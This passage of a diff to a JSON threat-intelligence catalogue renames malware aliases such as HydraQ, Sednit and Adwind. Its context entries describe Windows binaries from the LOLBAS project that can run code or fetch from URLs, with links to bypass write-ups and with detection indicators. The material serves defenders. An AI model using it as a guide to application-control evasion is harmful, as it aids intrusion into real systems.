Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]", @@ -12963,7 +12963,7 @@ } ], "uuid": "ae7376fa-b847-4417-bb29-f0316d507a30", - "value": "HttpDump" + "value": "HttpDump - Associated Software" }, { "description": "[HTTPBrowser](https://app.tidalcyber.com/software/c4fe23f7-f18c-40f6-b431-0b104b497eaa) is malware that has been used by several threat groups. [[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)] [[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)] It is believed to be of Chinese origin. [[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]", @@ -13039,7 +13039,7 @@ } ], "uuid": "6289f8d1-0b84-47ff-ba58-cfd3e14776d7", - "value": "Roarur" + "value": "Roarur - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -13053,7 +13053,7 @@ } ], "uuid": "dd780c01-a937-4658-83bd-46a65c054c94", - "value": "HomeUnix" + "value": "HomeUnix - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -13067,7 +13067,7 @@ } ], "uuid": "af34fe17-6c8c-4acb-af9a-e5690b6badf2", - "value": "HydraQ" + "value": "HydraQ - Associated Software" }, { "description": "[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)][[Symantec Trojan.Hydraq Jan 2010](https://app.tidalcyber.com/references/10bed842-400f-4276-972d-5fca794ea778)]", @@ -13081,7 +13081,7 @@ } ], "uuid": "259df672-c6da-4aa9-9bdb-4bc2031ad5c4", - "value": "Aurora" + "value": "Aurora - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -13095,7 +13095,7 @@ } ], "uuid": "6c573ae8-c8be-47df-8f2c-37cf44682526", - "value": "MdmBot" + "value": "MdmBot - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -13109,7 +13109,7 @@ } ], "uuid": "18a743ce-f743-41af-8769-af48e3e327b8", - "value": "Homux" + "value": "Homux - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -13123,7 +13123,7 @@ } ], "uuid": "bfb0d570-1fd7-406c-bce3-f9185b1049cf", - "value": "HidraQ" + "value": "HidraQ - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -13137,7 +13137,7 @@ } ], "uuid": "909a0326-a18f-4c92-8f57-f3dc18df4cd5", - "value": "McRat" + "value": "McRat - Associated Software" }, { "description": "[[MicroFocus 9002 Aug 2016](https://app.tidalcyber.com/references/a4d6bdd1-e70c-491b-a569-72708095c809)]", @@ -13151,7 +13151,7 @@ } ], "uuid": "b5319b1f-bc11-4e2b-8018-f5cb021fbc4f", - "value": "9002 RAT" + "value": "9002 RAT - Associated Software" }, { "description": "[Hydraq](https://app.tidalcyber.com/software/4ffbca79-358a-4ba5-bfbb-dc1694c45646) is a data-theft trojan first used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://app.tidalcyber.com/groups/5f083251-f5dc-459a-abfc-47a1aa7f5094).[[MicroFocus 9002 Aug 2016](https://app.tidalcyber.com/references/a4d6bdd1-e70c-491b-a569-72708095c809)][[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)][[Symantec Trojan.Hydraq Jan 2010](https://app.tidalcyber.com/references/10bed842-400f-4276-972d-5fca794ea778)][[ASERT Seven Pointed Dagger Aug 2015](https://app.tidalcyber.com/references/a8f323c7-82bc-46e6-bd6c-0b631abc644a)][[FireEye DeputyDog 9002 November 2013](https://app.tidalcyber.com/references/68b5a913-b696-4ca5-89ed-63453023d2a2)][[ProofPoint GoT 9002 Aug 2017](https://app.tidalcyber.com/references/b796f889-400c-440b-86b2-1588fd15f3ae)][[FireEye Sunshop Campaign May 2013](https://app.tidalcyber.com/references/ec246c7a-3396-46f9-acc4-a100cb5e5fe6)][[PaloAlto 3102 Sept 2015](https://app.tidalcyber.com/references/db340043-43a7-4b16-a570-92a0d879b2bf)]", @@ -13342,7 +13342,7 @@ } ], "uuid": "a211a6fa-b203-46df-b2d2-244a92bd310c", - "value": "Ie4uinit.exe" + "value": "Ie4uinit.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Executes commands from a specially prepared ie4uinit.inf file.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\windows\\system32\\ie4uinit.exe\n* c:\\windows\\sysWOW64\\ie4uinit.exe\n* c:\\windows\\system32\\ieuinit.inf\n* c:\\windows\\sysWOW64\\ieuinit.inf\n\n**Resources:**\n* [https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/)\n\n**Detection:**\n* IOC: ie4uinit.exe copied outside of %windir%\n* IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%\n* Sigma: [proc_creation_win_lolbin_ie4uinit.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml)[[Ie4uinit.exe - LOLBAS Project](/references/01f9a368-5933-47a1-85a9-e5883a5ca266)]", @@ -13385,7 +13385,7 @@ } ], "uuid": "da3647b2-1431-4292-affb-9e24d647a6fe", - "value": "Ieadvpack.dll" + "value": "Ieadvpack.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\ieadvpack.dll\n* c:\\windows\\syswow64\\ieadvpack.dll\n\n**Resources:**\n* [https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/)\n* [https://twitter.com/pabraeken/status/991695411902599168](https://twitter.com/pabraeken/status/991695411902599168)\n* [https://twitter.com/0rbz_/status/974472392012689408](https://twitter.com/0rbz_/status/974472392012689408)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___advpack.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml)[[Ieadvpack.dll - LOLBAS Project](/references/79943a49-23d6-499b-a022-7c2f8bd68aee)]", @@ -13428,7 +13428,7 @@ } ], "uuid": "8d176fe1-a0f6-48a6-a0d8-ac71faddcc0c", - "value": "iediagcmd.exe" + "value": "iediagcmd.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Diagnostics Utility for Internet Explorer\n\n**Author:** manasmbellani\n\n**Paths:**\n* C:\\Program Files\\Internet Explorer\\iediagcmd.exe\n\n**Resources:**\n* [https://twitter.com/Hexacorn/status/1507516393859731456](https://twitter.com/Hexacorn/status/1507516393859731456)\n\n**Detection:**\n* Sigma: [https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml](https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml)\n* IOC: Sysmon Event ID 1\n* IOC: Execution of process iediagcmd.exe with /out could be suspicious[[iediagcmd.exe - LOLBAS Project](/references/de238a18-2275-497e-adcf-453a016a24c4)]", @@ -13470,7 +13470,7 @@ } ], "uuid": "77a7429e-b1bb-4172-9fc5-3a37a4cedddc", - "value": "Ieexec.exe" + "value": "Ieexec.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe\n\n**Resources:**\n* [https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/](https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_ieexec_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* IOC: Network connections originating from ieexec.exe may be suspicious[[Ieexec.exe - LOLBAS Project](/references/91f31525-585d-4b71-83d7-9b7c2feacd34)]", @@ -13512,7 +13512,7 @@ } ], "uuid": "567ab907-8765-400b-8dd5-61182ddd8db6", - "value": "Ieframe.dll" + "value": "Ieframe.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Internet Browser DLL for translating HTML code.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\ieframe.dll\n* c:\\windows\\syswow64\\ieframe.dll\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/](http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/)\n* [https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/)\n* [https://twitter.com/bohops/status/997690405092290561](https://twitter.com/bohops/status/997690405092290561)\n* [https://windows10dll.nirsoft.net/ieframe_dll.html](https://windows10dll.nirsoft.net/ieframe_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Ieframe.dll - LOLBAS Project](/references/aab9c80d-1f1e-47ba-954d-65e7400054df)]", @@ -13571,7 +13571,7 @@ } ], "uuid": "1ffb9eb7-4c5b-4d88-93a5-79f250715502", - "value": "OSX/MacDownloader" + "value": "OSX/MacDownloader - Associated Software" }, { "description": "[iKitten](https://app.tidalcyber.com/software/71098f6e-a2c0-434f-b991-6c079fd3e82d) is a macOS exfiltration agent [[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)].", @@ -13612,7 +13612,7 @@ } ], "uuid": "49269d59-3a99-4362-83ea-41207ee591b4", - "value": "Ilasm.exe" + "value": "Ilasm.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** used for compile c# code into dll or exe.\n\n**Author:** Hai vaknin (lux)\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe\n\n**Resources:**\n* [https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt](https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt)\n\n**Detection:**\n* IOC: Ilasm may not be used often in production environments (such as on endpoints)\n* Sigma: [proc_creation_win_lolbin_ilasm.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml)[[Ilasm.exe - LOLBAS Project](/references/347a1f01-02ce-488e-9100-862971c1833f)]", @@ -13655,7 +13655,7 @@ } ], "uuid": "12fa3dba-d84c-490d-bb72-88b54edf663c", - "value": "IMEWDBLD.exe" + "value": "IMEWDBLD.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft IME Open Extended Dictionary Module\n\n**Author:** Wade Hickey\n\n**Paths:**\n* C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe\n\n**Resources:**\n* [https://twitter.com/notwhickey/status/1367493406835040265](https://twitter.com/notwhickey/status/1367493406835040265)\n\n**Detection:**\n* Sigma: [net_connection_win_imewdbld.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml)[[IMEWDBLD.exe - LOLBAS Project](/references/9d1d6bc1-61cf-4465-b3cb-b6af36769027)]", @@ -13823,7 +13823,7 @@ } ], "uuid": "4bf0e893-5e72-48aa-898a-7dfeffa7781a", - "value": "CRASHOVERRIDE" + "value": "CRASHOVERRIDE - Associated Software" }, { "description": "[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)]", @@ -13837,7 +13837,7 @@ } ], "uuid": "5e72df38-9dd3-4b0a-a0da-d98cd732e823", - "value": "Win32/Industroyer" + "value": "Win32/Industroyer - Associated Software" }, { "description": "[Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)] [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) was used in the attacks on the Ukrainian power grid in December 2016.[[Dragos Crashoverride 2017](https://app.tidalcyber.com/references/c8f624e3-2ba2-4564-bd1c-f06b9a6a8bce)] This is the first publicly known malware specifically designed to target and impact operations in the electric grid.[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]", @@ -13914,7 +13914,7 @@ } ], "uuid": "54922044-3d2e-4885-b314-2c0e2628fd75", - "value": "Infdefaultinstall.exe" + "value": "Infdefaultinstall.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used to perform installation based on content inside inf files\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Infdefaultinstall.exe\n* C:\\Windows\\SysWOW64\\Infdefaultinstall.exe\n\n**Resources:**\n* [https://twitter.com/KyleHanslovan/status/911997635455852544](https://twitter.com/KyleHanslovan/status/911997635455852544)\n* [https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/](https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/)\n* [https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/)\n\n**Detection:**\n* Sigma: [proc_creation_win_infdefaultinstall_execute_sct_scripts.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[Infdefaultinstall.exe - LOLBAS Project](/references/5e83d17c-dbdd-4a6c-a395-4f921b68ebec)]", @@ -13977,7 +13977,7 @@ } ], "uuid": "91100384-d619-4bf1-9f83-7ffc16d777f2", - "value": "Installutil.exe" + "value": "Installutil.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/](https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/)\n* [https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12](https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md)\n* [https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/](https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool](https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool)\n\n**Detection:**\n* Sigma: [proc_creation_win_instalutil_no_log_execution.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml)\n* Sigma: [proc_creation_win_lolbin_installutil_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml)\n* Elastic: [defense_evasion_installutil_beacon.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[LOLBAS Installutil](/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]", @@ -14020,7 +14020,7 @@ } ], "uuid": "0ea31764-5a77-4510-b873-ca1e8bdaf90e", - "value": "Interact.sh" + "value": "Interact.sh - Associated Software" }, { "description": "According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is \"an open-source tool for detecting external interactions (communication)\". The Advisory further states that the tool is \"used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity\".[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]", @@ -14389,7 +14389,7 @@ } ], "uuid": "c1808fee-703d-4116-8d6e-7d181244c928", - "value": "Trojan.Sofacy" + "value": "Trojan.Sofacy - Associated Software" }, { "description": "This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -14403,7 +14403,7 @@ } ], "uuid": "04241120-45d5-4261-a13b-4816d2dfc8a7", - "value": "Sednit" + "value": "Sednit - Associated Software" }, { "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", @@ -14417,7 +14417,7 @@ } ], "uuid": "59124557-6250-48b8-aaf8-3fc51df2c993", - "value": "Seduploader" + "value": "Seduploader - Associated Software" }, { "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -14431,7 +14431,7 @@ } ], "uuid": "771f1cd5-dac6-43c9-8c93-9f70ce4137e1", - "value": "JKEYSKW" + "value": "JKEYSKW - Associated Software" }, { "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -14445,7 +14445,7 @@ } ], "uuid": "fb803c34-1dbd-4bb4-b397-faec053abe77", - "value": "GAMEFISH" + "value": "GAMEFISH - Associated Software" }, { "description": "[[Unit 42 Sofacy Feb 2018](https://app.tidalcyber.com/references/0bcc2d76-987c-4a9b-9e00-1400eec4e606)]", @@ -14459,7 +14459,7 @@ } ], "uuid": "111fc9b5-1c08-4256-ab5b-7adf2a8bd81e", - "value": "SofacyCarberp" + "value": "SofacyCarberp - Associated Software" }, { "description": "[JHUHUGIT](https://app.tidalcyber.com/software/d50ef3fc-7d1c-4a82-b1cf-2319d83da3ae) is malware used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). It is based on Carberp source code and serves as reconnaissance malware. [[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)] [[F-Secure Sofacy 2015](https://app.tidalcyber.com/references/56a95d3c-5268-4e69-b669-7055fb38d570)] [[ESET Sednit Part 1](https://app.tidalcyber.com/references/a2016103-ead7-46b3-bae5-aa97c45a12b7)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -14550,7 +14550,7 @@ } ], "uuid": "88632c03-4d0a-4307-8d96-370a9fa0c49c", - "value": "JSocket" + "value": "JSocket - Associated Software" }, { "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", @@ -14564,7 +14564,7 @@ } ], "uuid": "f5019366-a5f7-4b6f-ba22-de56a66dc7ca", - "value": "Unrecom" + "value": "Unrecom - Associated Software" }, { "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", @@ -14578,7 +14578,7 @@ } ], "uuid": "45890a41-4d9a-4a8c-8758-9ed70c6355f4", - "value": "jFrutas" + "value": "jFrutas - Associated Software" }, { "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", @@ -14592,7 +14592,7 @@ } ], "uuid": "c1239f48-76e5-40c5-897d-80a7d14f8613", - "value": "Adwind" + "value": "Adwind - Associated Software" }, { "description": "[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]", @@ -14606,7 +14606,7 @@ } ], "uuid": "7a75e4bf-a8cf-4fb0-b147-12db5a0bb77a", - "value": "jBiFrost" + "value": "jBiFrost - Associated Software" }, { "description": "[[jRAT Symantec Aug 2018](https://app.tidalcyber.com/references/8aed9534-2ec6-4c9f-b63b-9bb135432cfb)]", @@ -14620,7 +14620,7 @@ } ], "uuid": "4fcf08b4-de50-4ab6-a7ae-a3c3a64f32cc", - "value": "Trojan.Maljava" + "value": "Trojan.Maljava - Associated Software" }, { "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", @@ -14634,7 +14634,7 @@ } ], "uuid": "13f9732c-1a38-45ca-9278-4b3266e32997", - "value": "AlienSpy" + "value": "AlienSpy - Associated Software" }, { "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", @@ -14648,7 +14648,7 @@ } ], "uuid": "cf5f6829-3cf7-445f-a4a3-dce78fe6034b", - "value": "Frutas" + "value": "Frutas - Associated Software" }, { "description": "[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]", @@ -14662,7 +14662,7 @@ } ], "uuid": "2adef0c3-f776-48c1-9293-d355b9dbefd7", - "value": "Sockrat" + "value": "Sockrat - Associated Software" }, { "description": "[jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) have been distributed via a software-as-a-service platform, similar to an online subscription model.[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)] [[jRAT Symantec Aug 2018](https://app.tidalcyber.com/references/8aed9534-2ec6-4c9f-b63b-9bb135432cfb)]", @@ -14745,7 +14745,7 @@ } ], "uuid": "adc0e1d8-3291-4c6f-9429-b6a61fb089a7", - "value": "Jsc.exe" + "value": "Jsc.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary file used by .NET to compile JavaScript code to .exe or .dll format\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Jsc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Jsc.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Jsc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Jsc.exe\n\n**Resources:**\n* [https://twitter.com/DissectMalware/status/998797808907046913](https://twitter.com/DissectMalware/status/998797808907046913)\n* [https://www.phpied.com/make-your-javascript-a-windows-exe/](https://www.phpied.com/make-your-javascript-a-windows-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_jsc.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml)\n* IOC: Jsc.exe should normally not run a system unless it is used for development.[[Jsc.exe - LOLBAS Project](/references/ae25ff74-05eb-46d7-9c60-4c149b7c7f1f)]", @@ -14992,7 +14992,7 @@ } ], "uuid": "115076c8-07e5-4bb3-8951-0a1a57666b17", - "value": "OSX/Keydnap" + "value": "OSX/Keydnap - Associated Software" }, { "description": "This piece of malware steals the content of the user's keychain while 